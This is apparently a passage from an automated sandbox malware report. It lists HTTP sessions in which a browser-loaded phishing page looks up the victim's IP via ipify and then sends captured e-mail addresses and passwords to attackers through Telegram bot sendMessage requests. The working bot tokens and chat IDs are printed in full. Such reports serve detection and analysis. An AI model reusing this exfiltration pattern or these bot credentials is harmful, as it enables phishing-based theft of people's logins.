                                                        2025-03-25 14:45:09 UTC4096INData Raw: b1 20 36 0a 49 ac 64 79 ad 89 0c 60 8a 0f 9d 49 37 fc 21 fe 4d a6 f9 f0 c1 ef 3a ce bf ad a0 98 9d a7 a8 43 b8 c0 eb 2a a5 81 3d c0 87 0b fb 0d 5e cf 57 e1 75 74 22 64 bf 80 ac ed 0c 8a fa 8f 50 99 79 1b ab ca 57 d0 52 be 80 af 27 5e c3 37 5c fe a3 e2 15 fc eb 98 0c c0 6f 47 7e 8b 87 e3 6f e0 91 e6 3d 3c 9a f9 54 ca 00 1e 11 82 52 cc 7e 81 43 ed 65 c6 25 3c 9e 39 81 a7 ca d7 f1 c3 e8 af f1 74 e4 37 32 00 c5 fe a6 eb 38 b4 f6 48 6d fe 44 1c d9 6e 48 e3 00 3e 0c 29 f1 30 32 81 47 61 15 1e 05 c7 b9 3e 4c 00 4e e0 db cc f8 31 00 8f e3 38 8e e3 27 1c 04 60 7d 9d 4f dc ab 62 28 98 90 84 c0 67 55 bf f1 b5 e0 f3 4e 1f 31 69 59 80 f0 19 fa 02 32 02 59 4a d5 bf 52 f6 8f 37 ec a6 4f 1a 1f 30 d2 f0 3e af 0a 0e d4 08 13 22 d0 16 ec 91 b2 80 b1 d0 49 6c cd 9c 24 e2 4e
                                                        Data Ascii: 6Idy`I7!M:C*=^Wut"dPyWR'^7\oG~o=<TR~Ce%<9t728HmDnH>)02Ga>LN18'`}Ob(gUN1iY2YJR7O0>"Il$N
                                                        2025-03-25 14:45:09 UTC4096INData Raw: f1 19 0e 02 70 89 00 ac 13 6c c5 49 3f f2 92 05 e4 34 a9 8a 79 7d ad ba 80 53 ab fd 02 ae 75 0a ad 8a 7f 5b 43 c2 45 a6 78 e1 9d 68 75 11 23 f5 fd 82 13 ad 86 1f 21 95 f9 b3 23 20 f8 ab 99 e0 2d 13 62 0c 5f 76 10 96 ae 07 30 73 fa 61 9c 1d d8 88 25 81 5d df 06 15 2b 82 bf d5 f9 4f 96 c9 54 65 0a 37 fe 08 81 7d ad e7 2c 76 6e c0 2b a3 cf 21 ba f3 41 68 b7 3c 8e 6c f5 14 82 95 7e 78 c2 3a f8 e2 63 48 4d 69 89 13 0b c2 7e 29 4e b2 21 33 e9 40 3c 67 41 a2 39 80 68 46 ba 4e e1 b1 e7 dc 08 57 09 a7 98 53 d5 b3 8b 36 e5 e2 63 83 83 40 f2 c5 6d 08 8e 13 36 8b 49 e4 96 52 aa e8 37 56 6c 15 fb 4a 44 4b d2 d8 43 00 c8 73 23 99 3f 85 3f 29 26 4e 23 35 13 43 6a b6 88 74 23 47 f8 da 89 46 13 a2 29 ee d7 37 00 8d 7e 1b 74 c6 f5 d0 9a 0e 40 a7 eb 26 36 7b f8 7a 7d 70 85
                                                        Data Ascii: plI?4y}Su[CExhu#!# -b_v0sa%]+OTe7},vn+!Ah<l~x:cHMi~)N!3@<gA9hFNWS6c@m6IR7VlJDKCs#??)&N#5Cjt#GF)7~t@&6{z}p


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        9192.168.2.749713104.26.13.2054432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:31 UTC506OUTGET /?format=json HTTP/1.1
                                                        Host: api.ipify.org
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: null
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:32 UTC467INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 14:45:31 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 21
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Vary: Origin
                                                        cf-cache-status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 925f314aad5df02b-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=106308&min_rtt=105740&rtt_var=23159&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2817&recv_bytes=1078&delivery_rate=34670&cwnd=237&unsent_bytes=0&cid=f7e66102c28b00ff&ts=275&x=0"
                                                        2025-03-25 14:45:32 UTC21INData Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d
                                                        Data Ascii: {"ip":"161.77.13.20"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        10192.168.2.749714104.26.12.2054432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:32 UTC389OUTGET /?format=json HTTP/1.1
                                                        Host: api.ipify.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:32 UTC434INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 14:45:32 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 21
                                                        Connection: close
                                                        Vary: Origin
                                                        cf-cache-status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 925f314e990ea67e-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=109448&min_rtt=108153&rtt_var=24132&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=34419&cwnd=248&unsent_bytes=0&cid=6c5b17d44f3ab84a&ts=303&x=0"
                                                        2025-03-25 14:45:32 UTC21INData Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d
                                                        Data Ascii: {"ip":"161.77.13.20"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        11192.168.2.749716149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:32 UTC953OUTGET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: null
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:32 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:32 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 682
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:32 UTC682INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 30 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 37 31 38 33 35 39 31 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 65 37 20 45 4d 41 49 4c 20 52 45 5c 75 30 30 63 37 55 20 5c 75 64 38 33 64 5c 75 64 63 62 62 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6e 53 70 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 33 39 34 37 31 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 5f 30 30 32 32 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a
                                                        Data Ascii: {"ok":true,"result":{"message_id":30052,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.749715149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:32 UTC973OUTGET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: null
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:32 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:32 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 690
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:32 UTC690INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 39 36 33 35 36 33 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 32 32 33 5f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 78 32 32 33 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 35 30 38 32 39 30 38 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 20 4c 61 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 72 6c 65 6c 61 69 74 32 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 39 31 33
                                                        Data Ascii: {"ok":true,"result":{"message_id":60,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.749720149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:33 UTC856OUTGET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:34 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:33 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 690
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:34 UTC690INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 38 31 36 39 36 33 35 36 33 32 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 32 32 33 5f 42 6f 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 50 72 69 76 61 74 65 78 32 32 33 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 32 35 30 38 32 39 30 38 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 72 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4c 65 20 4c 61 69 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 6d 72 6c 65 6c 61 69 74 32 33 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 34 32 39 31 33
                                                        Data Ascii: {"ok":true,"result":{"message_id":61,"from":{"id":8169635632,"is_bot":true,"first_name":"Private223_Bot","username":"Privatex223_bot"},"chat":{"id":5250829081,"first_name":"Mr","last_name":"Le Lait","username":"mrlelait23","type":"private"},"date":1742913


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.749719149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:33 UTC836OUTGET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20s4dae2%40ymxrji.net%0AMot%20de%20passe%20%3A%20%2B3HApb)0*8w%24o%3EZj%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:34 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:33 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 682
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:34 UTC682INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 30 35 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 37 31 38 33 35 39 31 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 65 37 20 45 4d 41 49 4c 20 52 45 5c 75 30 30 63 37 55 20 5c 75 64 38 33 64 5c 75 64 63 62 62 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6e 53 70 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 33 39 34 37 31 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 5f 30 30 32 32 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a
                                                        Data Ascii: {"ok":true,"result":{"message_id":30053,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.749726104.26.13.2054432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:55 UTC506OUTGET /?format=json HTTP/1.1
                                                        Host: api.ipify.org
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: null
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:55 UTC467INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 14:45:55 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 21
                                                        Connection: close
                                                        Access-Control-Allow-Origin: *
                                                        Vary: Origin
                                                        cf-cache-status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 925f31df6e631a40-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=106273&min_rtt=106118&rtt_var=22531&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2815&recv_bytes=1078&delivery_rate=35099&cwnd=196&unsent_bytes=0&cid=be4bb1ac7ce92037&ts=268&x=0"
                                                        2025-03-25 14:45:55 UTC21INData Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d
                                                        Data Ascii: {"ip":"161.77.13.20"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.749730104.26.12.2054432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:56 UTC389OUTGET /?format=json HTTP/1.1
                                                        Host: api.ipify.org
                                                        Connection: keep-alive
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        Accept: */*
                                                        Sec-Fetch-Site: none
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Sec-Fetch-Storage-Access: active
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:57 UTC434INHTTP/1.1 200 OK
                                                        Date: Tue, 25 Mar 2025 14:45:56 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 21
                                                        Connection: close
                                                        Vary: Origin
                                                        cf-cache-status: DYNAMIC
                                                        Server: cloudflare
                                                        CF-RAY: 925f31e48ad28cb1-EWR
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=104815&min_rtt=101502&rtt_var=24836&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=36668&cwnd=179&unsent_bytes=0&cid=846c2fdf61a1456d&ts=271&x=0"
                                                        2025-03-25 14:45:57 UTC21INData Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d
                                                        Data Ascii: {"ip":"161.77.13.20"}


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.749728149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:56 UTC952OUTGET /bot6571835911:AAEqphJtOqp19UXEnPmjfu2YxYUNC1u5Uxk/sendMessage?chat_id=513947114&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20LogCopy%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: null
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:56 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:56 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 681
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                        2025-03-25 14:45:56 UTC681INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 33 30 30 35 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 35 37 31 38 33 35 39 31 31 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5c 75 64 38 33 64 5c 75 64 63 65 37 20 45 4d 41 49 4c 20 52 45 5c 75 30 30 63 37 55 20 5c 75 64 38 33 64 5c 75 64 63 62 62 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 6f 6e 53 70 61 6d 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 35 31 33 39 34 37 31 31 34 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 42 6c 61 63 6b 5f 30 30 32 32 35 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a
                                                        Data Ascii: {"ok":true,"result":{"message_id":30054,"from":{"id":6571835911,"is_bot":true,"first_name":"\ud83d\udce7 EMAIL RE\u00c7U \ud83d\udcbb","username":"MonSpam_bot"},"chat":{"id":513947114,"first_name":"Black","username":"Black_00225","type":"private"},"date":


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.749729149.154.167.2204432700C:\Program Files\Google\Chrome\Application\chrome.exe
                                                        TimestampBytes transferredDirectionData
                                                        2025-03-25 14:45:56 UTC972OUTGET /bot8169635632:AAGdDWe7NlfwxV1u8PhstkQPFz0pZQBPbr0/sendMessage?chat_id=5250829081&text=%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%20Tentative%20de%20connexion%20%F0%9F%8F%B4%E2%80%8D%E2%98%A0%EF%B8%8F%0AE-mail%20%3A%20tgza2n%40qxoyv.io%0AMot%20de%20passe%20%3A%20NdrbMHgek%264KP%40%3FYR%0AIP%20%3A%20161.77.13.20%0AAppareil%20%3A%20Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F134.0.0.0%20Safari%2F537.36 HTTP/1.1
                                                        Host: api.telegram.org
                                                        Connection: keep-alive
                                                        sec-ch-ua-platform: "Windows"
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                        sec-ch-ua-mobile: ?0
                                                        Accept: */*
                                                        Origin: null
                                                        Sec-Fetch-Site: cross-site
                                                        Sec-Fetch-Mode: cors
                                                        Sec-Fetch-Dest: empty
                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                        Accept-Language: en-US,en;q=0.9
                                                        2025-03-25 14:45:56 UTC388INHTTP/1.1 200 OK
                                                        Server: nginx/1.18.0
                                                        Date: Tue, 25 Mar 2025 14:45:56 GMT
                                                        Content-Type: application/json
                                                        Content-Length: 689
                                                        Connection: close
                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                        Access-Control-Allow-Origin: *
                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
